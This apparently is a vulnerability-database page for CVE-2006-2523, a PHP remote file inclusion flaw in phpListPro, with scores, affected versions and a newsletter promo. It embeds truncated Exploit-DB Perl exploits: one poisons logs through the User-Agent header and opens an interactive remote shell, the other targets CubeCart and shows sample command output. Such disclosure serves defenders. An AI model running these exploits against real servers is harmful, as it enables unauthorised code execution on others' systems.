CVE-2006-2523
published 2006-05-22CVE-2006-2523: PHP remote file inclusion vulnerability in config.php in phpListPro 2.0.1 and earlier, with magic_quotes_gpc disabled, allows remote attackers to execute…
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
3.00%
85.7th percentile
PHP remote file inclusion vulnerability in config.php in phpListPro 2.0.1 and earlier, with magic_quotes_gpc disabled, allows remote attackers to execute arbitrary PHP code via a URL in the Language cookie.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| smartisoft | phplistpro | <= 2.0.1 | — |
| smartisoft | phplistpro | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
phpListPro 2.0.1 - 'Language' Remote Code Execution
exploitdb·2006-05-19
CVE-2006-2523 phpListPro 2.0.1 - 'Language' Remote Code Execution
phpListPro 2.0.1 - 'Language' Remote Code Execution
---
#!/usr/bin/perl
#
# Title: phpListPro ";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") or die "[-] Connecting ... Could not connect to host.\n\n";
print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";
print $socket "User-Agent: ".$CODE."\r\n";
print $socket "Host: ".$serv."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);
print "[+] Ok! Now here the shell, type exit to quit\n";
print "[+] If it's not work maybe try another apache_path...\n\n";
print "[shell] ";
$cmd = ;
while($cmd !~ "exit")
{
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") or die "[-] Connecting ... Could not connect to host.\n\n";
print $socket "GET ".$path."config.php HTTP/1.1\r\n
Exploit-DB
CubeCart 3.0.6 - Remote Command Execution
exploitdb·2005-12-30
CVE-2006-0064 CubeCart 3.0.6 - Remote Command Execution
CubeCart 3.0.6 - Remote Command Execution
---
#!/usr/bin/perl
#
# cijfer-ccxpl - CubeCart
# All rights reserved.
#
## 1. example
#
# [cijfer@kalma:/research]$ perl ./cijfer-ccxpl.pl -h www.xxx.com -d
# [[email protected] /]$ id;uname -a
# uid=48(apache) gid=48(apache) groups=48(apache),2523(psaserv)
# Linux server.xxx.com 2.6.10-1.771_FC2 #1 Mon Mar 28 00:50:14 EST 2005 i686 i686 i386 GNU/Linux
#
# [[email protected] /]$
#
## 2. explanation
#
# a serious bug was discovered by me in CubeCart 3.0.6 and below which an attacker
# can remotely execute arbitrary commands via 'includes/orderSuccess.inc.php' where
# passing input to the 'glob' and 'cart_order_id' variable, we can attain access to
# passing input to the 'glob[rootDir]' variable, and include a remote execution script
# to execut
No writeups or analysis indexed.
http://secunia.com/advisories/20220http://www.osvdb.org/25694http://www.vupen.com/english/advisories/2006/1894https://exchange.xforce.ibmcloud.com/vulnerabilities/26621https://www.exploit-db.com/exploits/1805http://secunia.com/advisories/20220http://www.osvdb.org/25694http://www.vupen.com/english/advisories/2006/1894https://exchange.xforce.ibmcloud.com/vulnerabilities/26621https://www.exploit-db.com/exploits/1805
2006-05-22
Published